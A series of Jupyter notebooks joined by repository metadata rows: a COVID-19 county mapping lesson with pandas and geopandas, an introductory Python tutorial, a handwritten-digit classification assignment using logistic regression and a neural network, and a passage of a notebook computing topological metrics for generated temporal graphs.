"### Extract Data\n\nSince we have a row for each day in the dataset, we will use the **groupby** function to group _daily cases_ by _county_. Since some county names are found in more than one state, we have to group by _county_ and _state_ (as well as the fips code, to be sure). We will add them all up using the **sum** function.\n",
"_____no_output_____"
]
],
[
[
"# In our earlier segment we only looked at cases. \n# What if we also wanted to look at deaths? \n\n# Here we replaced ['cases'] with ['cases', 'deaths'] below.\n# This will group both cases and deaths by fips, county, and state values.\n\ncovid_grouped = covid_counties.groupby(['fips','county','state'])['cases', 'deaths']\n\n# Second, add up all the Covid-19 cases using sum\ncovid_total = covid_grouped.sum()\n\n#View the result, which should include the columns \"fips, county, state, cases, deaths\"\ncovid_total",
"_____no_output_____"
]
],
[
[
"Now we could apply some basic arithmetic for the rows using Pandas.\n\nLet's get the number of deaths per case for each county. This is called the Case Fatality Rather (CFR). We multiply by 100.0 to get the percentage at the end.\n\nBefore you run the code, make sure you understand that we are dividing deaths by cases for each row.",
"_____no_output_____"
]
],
[
[
"covid_total['deathpercase']=covid_total['deaths']/covid_total['cases']*100.0\n\n# Print out the new 'covid_total' dataframe with a new 'deathpercase' column\ncovid_total",
"_____no_output_____"
]
],
[
[
"Now that we have our data we can try some basic visualizations. Let's try making a scatter plot of cases on the x-axis and deaths on the y-axis.",
"_____no_output_____"
]
],
[
[
"covid_total.plot.scatter(x='cases', y='deaths')",
"_____no_output_____"
]
],
[
[
"Here are a few things you can try adding to the scatter function as parameters (remember to use commas to separate each of them).\n\n```python\n# Change the size of the dots\n# s=covid_total['deathpercase']\n# s=covid_total['deathpercase']*2\n```\n\nAnd, try a hex-bin plot.",
"_____no_output_____"
]
],
[
[
"covid_total.plot.hexbin(x='cases', y='deaths', gridsize=5)",
"_____no_output_____"
]
],
[
[
"### Merge data \nNow we'll load \"supplementary/counties_geometry.geojson\" into a geodataframe. You loaded this same file in an earlier segment on mapping Covid-19. We will (again) use **merge** to merge these two datasets into a **merged** geodataframe.",
"_____no_output_____"
]
],
[
[
"counties_geojson = geopandas.read_file(\"./supplementary/counties_geometry.geojson\")\n\n# Merge geography (counties_geojson) and covid cases and deaths (covid_total)\nmerged = pandas.merge(counties_geojson, covid_total, how='left',\n left_on=['NAME','state_name'], right_on = ['county','state'])\n\n# Let's take a quick look at our new merged geodataframe\nmerged",
"_____no_output_____"
]
],
[
[
"## 2. More Mapping\n\nNow that we have a merged dataset. We can try to create a few different maps. In this Exploration you can try to improve your first map.\n\nHere is the code from your first map. Run this code and then scroll down.",
"_____no_output_____"
]
],
[
[
"merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend=\"true\", \n legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})\npyplot.title(\"Number of Confirmed Cases\")",
"_____no_output_____"
]
],
[
[
"Below is that code chunk again. Now you can try changing the code to improve the look of your map. There are a lot of options to change. \n\n<u>If you break something, then just copy and paste the original code above to \"reset\".</u>\n\n- *column* represents the column that is being mapped. Change what you are mapping by replacing 'cases' with 'deaths' or 'deathpercase'\n\n- *cmap* represents the colormap. You can try any number of these by replacing 'OrRd' with: 'Purples' or 'Greens' or 'gist_gray'. There are lot of choices that you can see here: https://matplotlib.org/tutorials/colors/colormaps.html. If you want to learn more about color schemes check out: https://colorbrewer2.org\n\n- *scheme* represents the scheme for creating classes. Try a few other options by replacing 'fisher_jenks' with: 'natural_breaks' or 'quantiles'\n\n- *loc* represents the location of your legend. Move your legend by replacing 'lower left' with 'upper right' or 'upper left'\n\n- *title* represents the text in the legend box. If you changed the column that you are mapping, make sure to change the title too.\n\nWant to try more? Check out here for even more options\nhttps://geopandas.org/mapping.html#choropleth-maps",
"_____no_output_____"
]
],
[
[
"merged.plot(figsize=(15, 15), column='cases', cmap='OrRd', scheme='fisher_jenks', legend=\"true\", \n legend_kwds={'loc': 'lower left', 'title':'Number of Confirmed Cases'})\npyplot.title(\"Number of Confirmed Cases\")",
"_____no_output_____"
]
],
[
[
"# Congratulations!\n\n\n**You have finished an Hour of CI!**\n\n\nBut, before you go ... \n\n1. Please fill out a very brief questionnaire to provide feedback and help us improve the Hour of CI lessons. It is fast and your feedback is very important to let us know what you learned and how we can improve the lessons in the future.\n2. If you would like a certificate, then please type your name below and click \"Create Certificate\" and you will be presented with a PDF certificate.\n\n<font size=\"+1\"><a style=\"background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;\" href=\"https://forms.gle/JUUBm76rLB8iYppN7\">Take the questionnaire and provide feedback</a></font>\n",
"_____no_output_____"
]
],
[
[
"# This code cell loads the Interact Textbox that will ask users for their name\n# Once they click \"Create Certificate\" then it will add their name to the certificate template\n# And present them a PDF certificate\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\nfrom ipywidgets import interact\n\ndef make_cert(learner_name, lesson_name):\n cert_filename = 'hourofci_certificate.pdf'\n\n img = Image.open(\"../../supplementary/hci-certificate-template.jpg\")\n draw = ImageDraw.Draw(img)\n\n cert_font = ImageFont.truetype('../../supplementary/cruft.ttf', 150)\n cert_fontsm = ImageFont.truetype('../../supplementary/cruft.ttf', 80)\n \n w,h = cert_font.getsize(learner_name) \n draw.text( xy = (1650-w/2,1100-h/2), text = learner_name, fill=(0,0,0),font=cert_font)\n \n w,h = cert_fontsm.getsize(lesson_name)\n draw.text( xy = (1650-w/2,1100-h/2 + 750), text = lesson_name, fill=(0,0,0),font=cert_fontsm)\n \n img.save(cert_filename, \"PDF\", resolution=100.0) \n return cert_filename\n\n\ninteract_cert=interact.options(manual=True, manual_name=\"Create Certificate\")\n\n@interact_cert(name=\"Your Name\")\ndef f(name):\n print(\"Congratulations\",name)\n filename = make_cert(name, 'Gateway')\n print(\"Download your certificate by clicking the link below.\")\n \n \n \n",
"_____no_output_____"
]
],
[
[
"<font size=\"+1\"><a style=\"background-color:blue;color:white;padding:12px;margin:10px;font-weight:bold;\" href=\"hourofci_certificate.pdf?download=1\" download=\"hourofci_certificate.pdf\">Download your certificate</a></font>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb4fcbded9479a49fad424abfedb5bdadc99d992 | 6,510 | ipynb | Jupyter Notebook | _projects/project0/Jupyter-Getting-Started.ipynb | M-Sender/cmps3160 | 54546d307f913b35caa45efe6c5528dadb8055f2 | [
"MIT"
] | null | null | null | _projects/project0/Jupyter-Getting-Started.ipynb | M-Sender/cmps3160 | 54546d307f913b35caa45efe6c5528dadb8055f2 | [
"MIT"
] | null | null | null | _projects/project0/Jupyter-Getting-Started.ipynb | M-Sender/cmps3160 | 54546d307f913b35caa45efe6c5528dadb8055f2 | [
"MIT"
] | null | null | null | 25.833333 | 249 | 0.554224 | [
[
[
"# Welcome to Python!\n\nThere are many excellent Python and Jupyter/IPython tutorials out there. This Notebook contains a few snippets of code from here and there, but we suggest you go over some in-depth tutorials, especially if you are not familiar with Python. \n\nHere we borrow some material from:\n\n- [A Crash Course in Python for Scientists](http://nbviewer.ipython.org/gist/rpmuller/5920182) (which itself contains some nice links to other tutorials), \n- [matplotlib examples](http://matplotlib.org/gallery.html#),\n- [Chapter 1 from Pandas Cookbook](http://nbviewer.ipython.org/github/jvns/pandas-cookbook/tree/master/cookbook/)\n\nThis short introduction is itself written in Jupyter Notebook. See the Project 0 setup instructions to start a Jupyter server and open this notebook there.\n\nAs a starting point, you can simply type in expressions into the python shell in the browser.",
"_____no_output_____"
]
],
[
[
"8+8",
"_____no_output_____"
]
],
[
[
"Enter will continue the **cell**. If you want to execute the commands, you can either press the **play** button, or use Shift+Enter",
"_____no_output_____"
]
],
[
[
"days_of_the_week = [\"Sunday\",\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"]\nfor day in days_of_the_week:\n statement = \"Today is \" + day\n print(statement)",
"_____no_output_____"
]
],
[
[
"The above code uses a List. In case you haven't realized this yet, Python uses \"indentation\" to decide the scope, so there is no need to enclose code within {} or similar constructs. \n\nThe other data structures in Python include Tuples and Dictionaries. Tuples are similar to Lists, but are immutable so we can't modify it (say by appending). Dictionaries are similar to Maps.",
"_____no_output_____"
]
],
[
[
"tuple1 = (1,2,'hi',9.0)\ntuple1",
"_____no_output_____"
],
[
"# The following code will give an error since we are trying to change an immutable object\ntuple1.append(7)",
"_____no_output_____"
],
[
"ages_dictionary = {\"Rick\": 46, \"Bob\": 86, \"Fred\": 21}\nprint(\"Rick's age is \",ages_dictionary[\"Rick\"])",
"_____no_output_____"
]
],
[
[
"### Functions\n\nHere we write a quick function to compute the Fibonacci sequence (remember this from Discrete Math?)",
"_____no_output_____"
]
],
[
[
"def fibonacci(sequence_length):\n \"Return the Fibonacci sequence of length *sequence_length*\"\n sequence = [0,1]\n if sequence_length < 1:\n print(\"Fibonacci sequence only defined for length 1 or greater\")\n return\n if 0 < sequence_length < 3:\n return sequence[:sequence_length]\n for i in range(2,sequence_length): \n sequence.append(sequence[i-1]+sequence[i-2])\n return sequence",
"_____no_output_____"
],
[
"help(fibonacci)",
"_____no_output_____"
],
[
"fibonacci(10)",
"_____no_output_____"
]
],
[
[
"The following function shows several interesting features, including the ability to return multiple values as a tuple, and the idea of \"tuple assignment\", where objects are unpacked into variables (the first line after for).",
"_____no_output_____"
]
],
[
[
"positions = [\n ('Bob',0.0,21.0),\n ('Cat',2.5,13.1),\n ('Dog',33.0,1.2)\n ]\ndef minmax(objects):\n minx = 1e20 # These are set to really big numbers\n miny = 1e20\n for obj in objects:\n name,x,y = obj\n if x < minx: \n minx = x\n if y < miny:\n miny = y\n return minx,miny\n\nx,y = minmax(positions)\nprint(x,y)",
"_____no_output_____"
],
[
"import bs4",
"_____no_output_____"
],
[
"import requests",
"_____no_output_____"
],
[
"bs4",
"_____no_output_____"
],
[
"requests",
"_____no_output_____"
],
[
"from bs4 import BeautifulSoup",
"_____no_output_____"
]
],
[
[
"From here you could write a script to say, scrape a webpage. We will dive more into this in a future class when we look at data scraping.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb4fcc6ee04de1ad0e7a95c3327ca18486eec131 | 232,792 | ipynb | Jupyter Notebook | assignment3 multi-class classification/assignment3.ipynb | oeyh/NN | f07b6273425df47dab81a451edba04028c303134 | [
"MIT"
] | 1 | 2018-09-09T05:01:06.000Z | 2018-09-09T05:01:06.000Z | assignment3 multi-class classification/assignment3.ipynb | oeyh/NN | f07b6273425df47dab81a451edba04028c303134 | [
"MIT"
] | 6 | 2018-08-20T05:14:41.000Z | 2018-09-09T04:58:36.000Z | assignment3 multi-class classification/assignment3.ipynb | oeyh/NN | f07b6273425df47dab81a451edba04028c303134 | [
"MIT"
] | null | null | null | 294.673418 | 73,756 | 0.923812 | [
[
[
"# Multi-class Classification and Neural Networks\n\n## 1. Multi-class Classification\nIn this exercise, we will use logistic regression and neural networks to recognize handwritten digits (from 0 to 9). \n\n### 1.1 Dataset\nThe dataset ex3data1.mat contains 5000 training examples of handwritten digits. Each training example is a 20 pixel by 20 pixel grayscale image of the digit. Each pixel is represented by a floating point number indicating the grayscale intensity at that location (value between -1 and 1). The 20 by 20 grid of pixels are flattened into a 400 long vector. Each training example is a single row in data matrix X. This results in a 5000 by 400 matrix X where every row is a training example. \n\n$$ X=\\left[\\matrix{-(x^{(1)})^T-\\\\ -(x^{(2)})^T-\\\\ \\vdots\\\\ -(x^{(m)})^T-}\\right]_{5000\\times400} $$\n\nThe other dtat in the training set is a 5000 long vector y that contains labels for the training set. Since the data was prepared for MATLAB, in which index starts from 1, digits 0-9 have been converted to 1-10. Here, we will convert it back to using 0-9 as labels. ",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\n%matplotlib inline",
"_____no_output_____"
],
[
"from scipy.io import loadmat\n\ndata = loadmat('ex3data1.mat')\n\nX = data[\"X\"] # 5000x400 np array\ny = data[\"y\"] # 5000x1 np array (2d)\ny = y.flatten() # change to (5000,) 1d array and \ny[y==10] = 0 # convert to 0-9 scale from 1-10 scale",
"_____no_output_____"
]
],
[
[
"### 1.2 Visualizing the data",
"_____no_output_____"
]
],
[
[
"def displayData(X):\n \"\"\"displays the 100 rows of digit image data stored in X in a nice grid. \n It returns the figure handle fig, ax\n \"\"\"\n \n # form the big 10 x 10 matrix containing all 100 images data\n # padding between 2 images\n pad = 1\n # initialize matrix with -1 (black)\n wholeimage = -np.ones((20*10+9, 20*10+9))\n # fill values\n for i in range(10):\n for j in range(10):\n wholeimage[j*21:j*21+20, i*21:i*21+20] = X[10*i+j, :].reshape((20, 20))\n \n fig, ax = plt.subplots(figsize=(6, 6))\n ax.imshow(wholeimage.T, cmap=plt.cm.gray, vmin=-1, vmax=1)\n ax.axis('off')\n \n return fig, ax",
"_____no_output_____"
],
[
"x = X[3200:3300, :]\n\nfig, ax = displayData(x)\nax.axis('off')",
"_____no_output_____"
],
[
"# randomly select 100 data points to display\nrand_indices = np.random.randint(0, 5000, size=100)\nsel = X[rand_indices, :]\n\n# display images\nfig, ax = displayData(sel)",
"_____no_output_____"
]
],
[
[
"### 1.3 Vectorizing Logistic Regression\nSince it's already been vectorized in assignment 2, we will just copy the functions here, just renaming it to lrCostFunction(). This includes regularization. ",
"_____no_output_____"
]
],
[
[
"def sigmoid(z):\n \"\"\"sigmoid(z) computes the sigmoid of z. z can be a number,\n vector, or matrix. \n \"\"\"\n \n g = 1 / (1 + np.exp(-z))\n \n return g",
"_____no_output_____"
],
[
"def lrCostFucntion(theta, X, y, lmd):\n \"\"\"computes the cost of using\n% theta as the parameter for regularized logistic regression and the\n% gradient of the cost w.r.t. to the parameters.\n \"\"\"\n \n m = len(y)\n \n # prepare for matrix calculations\n y = y[:, np.newaxis]\n \n # to prevent error in scipy.optimize.minimize(method='CG')\n # unroll theta first, make sure theta is (n+1) by 1 array\n theta = theta.ravel()\n theta = theta[:, np.newaxis]\n \n \n# print('theta: {}'.format(theta.shape))\n# print('X: {}'.format(X.shape))\n# print('y: {}'.format(y.shape))\n # cost\n J = ([email protected](sigmoid(X@theta)))/m - ((1-y.T)@np.log(1-sigmoid(X@theta)))/m + (theta[1:].T@theta[1:])*lmd/(2*m)\n # J = J[0, 0]\n \n # gradient\n grad = np.zeros(theta.shape)\n\n # added newaxis in order to get 2d array instead of 1d array\n grad[0] = X.T[0, np.newaxis, :]@(sigmoid(X@theta)-y)/m\n \n grad[1:] = X.T[1:, :]@(sigmoid(X@theta)-y)/m + lmd*theta[1:]/m\n \n return J, grad.flatten()",
"_____no_output_____"
],
[
"# Test lrCostFunction\ntheta_t = np.array([-2, -1, 1, 2])\nX_t = np.concatenate((np.ones((5, 1)), np.arange(1, 16).reshape((5, 3), order='F')/10), axis=1)\ny_t = np.array([1, 0, 1, 0, 1])\nlambda_t = 3\nJ, grad = lrCostFucntion(theta_t, X_t, y_t, lambda_t)",
"_____no_output_____"
],
[
"print('Cost: {:.6f}'.format(J[0, 0]))\nprint('Expected: 2.534819')\nprint('Gradients: \\n{}'.format(grad))\nprint('Expected: \\n0.146561\\n -0.548558\\n 0.724722\\n 1.398003\\n')",
"Cost: 2.534819\nExpected: 2.534819\nGradients: \n[ 0.14656137 -0.54855841 0.72472227 1.39800296]\nExpected: \n0.146561\n -0.548558\n 0.724722\n 1.398003\n\n"
]
],
[
[
"### 1.4 One-vs-all Classification\nHere, we implement one-vs-all classification by training multiple regularized logistic regression classifier, one for each of the K classes in our dataset. K=10 in this case. ",
"_____no_output_____"
]
],
[
[
"from scipy.optimize import minimize",
"_____no_output_____"
],
[
"def oneVsAll(X, y, num_class, lmd):\n \"\"\"trains num_labels logistic regression classifiers and returns each of these classifiers\n% in a matrix all_theta, where the i-th row of all_theta corresponds \n% to the classifier for label i\n \"\"\"\n \n # m is number of training samples, n is number of features + 1\n m, n = X.shape\n \n # store theta results\n all_theta = np.zeros((num_class, n))\n #print(all_theta.shape)\n \n # initial conidition, 1d array\n theta0 = np.zeros(n)\n print(theta0.shape)\n \n # train one theta at a time\n for i in range(num_class):\n \n # y should be either 0 or 1, representing true or false\n ylabel = (y==i).astype(int)\n \n # run optimization\n result = minimize(lrCostFucntion, theta0, args=(X, ylabel, lmd), method='CG', \n jac=True, options={'disp': True, 'maxiter':1000})\n # print(result)\n all_theta[i, :] = result.x\n \n return all_theta",
"_____no_output_____"
],
[
"# prepare parameters\nlmd = 0.1\nm = len(y)\nX_wb = np.concatenate((np.ones((m, 1)), X), axis=1)\nnum_class = 10 # 10 classes, digits 0 to 9\n\nprint(X_wb.shape)\nprint(y.shape)\n\n# Run training\nall_theta = oneVsAll(X_wb, y, num_class, lmd)",
"(5000, 401)\n(5000,)\n(401,)\nOptimization terminated successfully.\n Current function value: 0.008577\n Iterations: 113\n Function evaluations: 434\n Gradient evaluations: 434\nOptimization terminated successfully.\n Current function value: 0.013123\n Iterations: 104\n Function evaluations: 400\n Gradient evaluations: 400\nOptimization terminated successfully.\n Current function value: 0.050811\n Iterations: 237\n Function evaluations: 727\n Gradient evaluations: 727\nOptimization terminated successfully.\n Current function value: 0.057605\n Iterations: 250\n Function evaluations: 742\n Gradient evaluations: 742\nOptimization terminated successfully.\n Current function value: 0.033086\n Iterations: 207\n Function evaluations: 682\n Gradient evaluations: 682\nOptimization terminated successfully.\n Current function value: 0.054466\n Iterations: 253\n Function evaluations: 755\n Gradient evaluations: 755\nOptimization terminated successfully.\n Current function value: 0.018260\n Iterations: 143\n Function evaluations: 523\n Gradient evaluations: 523\nOptimization terminated successfully.\n Current function value: 0.030647\n Iterations: 199\n Function evaluations: 667\n Gradient evaluations: 667\nOptimization terminated successfully.\n Current function value: 0.078461\n Iterations: 275\n Function evaluations: 757\n Gradient evaluations: 757\nOptimization terminated successfully.\n Current function value: 0.071201\n Iterations: 296\n Function evaluations: 851\n Gradient evaluations: 851\n"
]
],
[
[
"#### One-vs-all Prediction",
"_____no_output_____"
]
],
[
[
"def predictOneVsAll(all_theta, X):\n \"\"\"will return a vector of predictions\n% for each example in the matrix X. Note that X contains the examples in\n% rows. all_theta is a matrix where the i-th row is a trained logistic\n% regression theta vector for the i-th class. You should return column vector \n% of values from 1..K (e.g., p = [1; 3; 1; 2] predicts classes 1, 3, 1, 2\n% for 4 examples)\n \"\"\"\n \n # apply np.argmax to the output matrix to find the predicted label \n # for that training sample\n out = (all_theta @ X.T).T\n #print(out[4000:4020, :])\n return np.argmax(out, axis=1)",
"_____no_output_____"
],
[
"# prediction accuracy\npred = predictOneVsAll(all_theta, X_wb)\nprint(pred.shape)\n\naccuracy = np.sum((pred==y).astype(int))/m*100\nprint('Training accuracy is {:.2f}%'.format(accuracy))",
"(5000,)\nTraining accuracy is 96.46%\n"
]
],
[
[
"## 2. Neural Networks\nIn the previous part of this exercise, you implemented multi-class logistic re-\ngression to recognize handwritten digits. However, logistic regression cannot\nform more complex hypotheses as it is only a linear classifier.3\nIn this part of the exercise, you will implement a neural network to rec-\nognize handwritten digits using the same training set as before. The neural\nnetwork will be able to represent complex models that form non-linear hy-\npotheses.\n\nFor this week, you will be using parameters from a neural network\nthat we have already trained. Your goal is to implement the feedforward\npropagation algorithm to use our weights for prediction.\n\nOur neural network is shown in Figure 2. It has 3 layers: an input layer, a\nhidden layer and an output layer. Recall that our inputs are pixel values of\ndigit images. Since the images are of size 20x20, this gives us 400 input layer\nunits (excluding the extra bias unit which always outputs +1). As before,\nthe training data will be loaded into the variables X and y.\n\nA set of pre-trained network parameters ($\\Theta_{(1)},\\Theta_{(2)}$) are provided and stored in ex3weights.mat. The neural network used contains 25 units in the 2nd layer and 10 output units (corresponding to 10 digit classes).\n\n",
"_____no_output_____"
]
],
[
[
"#from scipy.io import loadmat\n\ndata = loadmat('ex3weights.mat')\n\nTheta1 = data[\"Theta1\"] # 25x401 np array\nTheta2 = data[\"Theta2\"] # 10x26 np array (2d)\nprint(Theta1.shape, Theta2.shape)",
"(25, 401) (10, 26)\n"
]
],
[
[
"### Vectorizing the forward propagation\nMatrix dimensions:\n\n$X_wb$: 5000 x 401\n\n$\\Theta^{(1)}$: 25 x 401\n\n$\\Theta^{(2)}$: 10 x 26\n\n$a^{(2)}$: 5000 x 25 or 5000 x 26 after adding intercept terms\n\n$a^{(3)}$: 5000 x 10\n\n$$a^{(2)} = g(X_{wb}\\Theta^{(1)^T})$$\n\n$$a^{(3)} = g(a^{(2)}_{wb}\\Theta^{(2)^T})$$",
"_____no_output_____"
]
],
[
[
"def predict(X, Theta1, Theta2):\n \"\"\" predicts output given network parameters Theta1 and Theta2 in Theta. \n The prediction from the neural network will be the label that has the largest output.\n \"\"\"\n \n a2 = sigmoid(X @ Theta1.T)\n \n # add intercept terms to a2\n m, n = a2.shape\n a2_wb = np.concatenate((np.ones((m, 1)), a2), axis=1)\n \n a3 = sigmoid(a2_wb @ Theta2.T)\n# print(a3[:10, :])\n \n # apply np.argmax to the output matrix to find the predicted label \n # for that training sample\n # correct for indexing difference between MATLAB and Python\n p = np.argmax(a3, axis=1) + 1\n p[p==10] = 0\n\n return p # this is a 1d array",
"_____no_output_____"
],
[
"# prediction accuracy\npred = predict(X_wb, Theta1, Theta2)\nprint(pred.shape)\n\n\naccuracy = np.sum((pred==y).astype(int))/m*100\nprint('Training accuracy is {:.2f}%'.format(accuracy))",
"(5000,)\nTraining accuracy is 97.52%\n"
],
[
"\n# randomly show 10 images and corresponding results\n# randomly select 10 data points to display\nrand_indices = np.random.randint(0, 5000, size=10)\nsel = X[rand_indices, :]\n\nfor i in range(10):\n \n # Display predicted digit\n print(\"Predicted {} for this image: \".format(pred[rand_indices[i]]))\n \n # display image\n fig, ax = plt.subplots(figsize=(2, 2))\n ax.imshow(sel[i, :].reshape(20, 20).T, cmap=plt.cm.gray, vmin=-1, vmax=1)\n ax.axis('off')\n plt.show()",
"Predicted 7 for this image: \n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb4fd750ea3dea41ec1c01040e18d73721164945 | 104,839 | ipynb | Jupyter Notebook | Evaluation/Topology-multiple_run-KL.ipynb | AntonioLonga/ETNgen | 0a9a2f330e24006c7c9c6acef89297db991e0b64 | [
"MIT"
] | 1 | 2022-02-18T14:35:28.000Z | 2022-02-18T14:35:28.000Z | Evaluation/Topology-multiple_run-KL.ipynb | AntonioLonga/ETNgen | 0a9a2f330e24006c7c9c6acef89297db991e0b64 | [
"MIT"
] | null | null | null | Evaluation/Topology-multiple_run-KL.ipynb | AntonioLonga/ETNgen | 0a9a2f330e24006c7c9c6acef89297db991e0b64 | [
"MIT"
] | null | null | null | 130.073201 | 78,484 | 0.851925 | [
[
[
"import construction as cs\nimport matplotlib.pyplot as plt\n\n### read font\nfrom matplotlib import font_manager\n\nfont_dirs = ['Barlow/']\nfont_files = font_manager.findSystemFonts(fontpaths=font_dirs)\n\nfor font_file in font_files:\n font_manager.fontManager.addfont(font_file)\n\n# set font\nplt.rcParams['font.family'] = 'Barlow'\n\nimport networkx as nx\n%matplotlib inline\n%config InlineBackend.figure_format = 'retina'\n\n%load_ext autoreload\n%autoreload 2",
"_____no_output_____"
]
],
[
[
"# Load generated graphs",
"_____no_output_____"
]
],
[
[
"def load_origin_graph(file_name,gap=299):\n data_in = cs.load_data(\"../Datasets/\"+file_name+\".dat\")\n gap = 299 \n graphs_in = cs.build_graphs(data_in,gap=gap)\n return graphs_in\n\ndef load_ETNgen_graph(file_name):\n path = \"../Generated_graphs/Multiple_run/\"+file_name+\"/\"\n gap = 299 \n graphs = []\n for i in os.listdir(path):\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs\n\n\ndef load_dym_graph(file_name):\n path = \"../Competitors_generated_graphs/Dymond/Multiple_run/\"+file_name+\"/\"\n gap = 0 \n graphs = []\n for i in os.listdir(path):\n print(path+i)\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs\n\ndef load_stm_graph(file_name):\n path = \"../Competitors_generated_graphs/STM/Multiple_run/\"+file_name+\"/\"\n gap = 0 \n graphs = []\n for i in os.listdir(path):\n print(path+i)\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs\n\ndef load_tag_graph(file_name):\n path = \"../Competitors_generated_graphs/TagGen/Multiple_run/\"+file_name+\"/\"\n gap = 0 \n graphs = []\n for i in os.listdir(path):\n print(path+i)\n data_in = cs.load_data(path+i)\n graphs_in = cs.build_graphs(data_in,gap=gap)\n graphs.append(graphs_in)\n return graphs",
"_____no_output_____"
],
[
"import networkx as nx\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\nfrom topological_metrics import *\n\nimport os",
"_____no_output_____"
]
],
[
[
"# Compute and store topological distributions",
"_____no_output_____"
]
],
[
[
"file_name = \"High_School11\"\norig_graphs = load_origin_graph(file_name,gap=299)\netn_gen = load_ETNgen_graph(file_name)\ndym_gen = load_dym_graph(file_name)\ntag_gen = load_tag_graph(file_name)\nstm_gen = load_stm_graph(file_name)",
"_____no_output_____"
],
[
"def comp_metric(graphs,metric):\n metric_dist = []\n for graph in graphs:\n metric_dist.append(metric(graph))\n return metric_dist\n\ndef compute_store_metrics(metrics,metrics_names,generator,file_name,graphs):\n for i in range(len(metrics)):\n metric = metrics[i]\n metric_name = metrics_names[i]\n met = comp_metric(graphs,metric)\n np.save(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/\"+metric_name,met)\n \ndef compute_store_metrics_original(metrics,metrics_names,file_name,graphs):\n for i in range(len(metrics)):\n metric = metrics[i]\n metric_name = metrics_names[i]\n met = comp_metric([graphs],metric)\n np.save(\"topology_results/original_distributions/\"+file_name+\"/\"+metric_name,met)\n ",
"_____no_output_____"
],
[
"metrics = [density,global_clustering,average_shortest_path,dist_number_of_individuals,\n dist_number_of_new_conversations,get_ass,s_metric,dist_frequency_of_interactions,\n dist_strength_of_nodes,dist_duration]\nmetrics_names = [\"density\",\"clust\",\"asp\",\"nb_interactions\",\n \"new_con\",\"ass\",\"s_metric\",\"interacting_indiv\",\n \"streng\",\"dur\"]",
"_____no_output_____"
],
[
"compute_store_metrics_original(metrics,metrics_names,file_name,orig_graphs)",
"_____no_output_____"
],
[
"compute_store_metrics(metrics,metrics_names,\n \"etngen\",\n file_name,\n etn_gen)",
"_____no_output_____"
],
[
"compute_store_metrics(metrics,metrics_names,\n \"taggen\",\n file_name,\n tag_gen)\ncompute_store_metrics(metrics,metrics_names,\n \"stmgen\",\n file_name,\n stm_gen)\ncompute_store_metrics(metrics,metrics_names,\n \"dymgen\",\n file_name,\n dym_gen)",
"_____no_output_____"
]
],
[
[
"# load distributions",
"_____no_output_____"
]
],
[
[
"labels",
"_____no_output_____"
],
[
"def load_topo_distributions(generator,file_name):\n \n den = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/density.npy\",allow_pickle=True)\n clust = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/clust.npy\",allow_pickle=True)\n asp = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/asp.npy\",allow_pickle=True)\n nb_inter = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/nb_interactions.npy\",allow_pickle=True)\n new_conv = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/new_con.npy\",allow_pickle=True)\n ass = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/ass.npy\",allow_pickle=True)\n s_met = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/s_metric.npy\",allow_pickle=True)\n inter_indiv = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/interacting_indiv.npy\",allow_pickle=True)\n stren = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/streng.npy\",allow_pickle=True)\n durat = np.load(\"topology_results/\"+generator+\"/Multiple_run/distributions/\"+file_name+\"/dur.npy\",allow_pickle=True)\n \n return 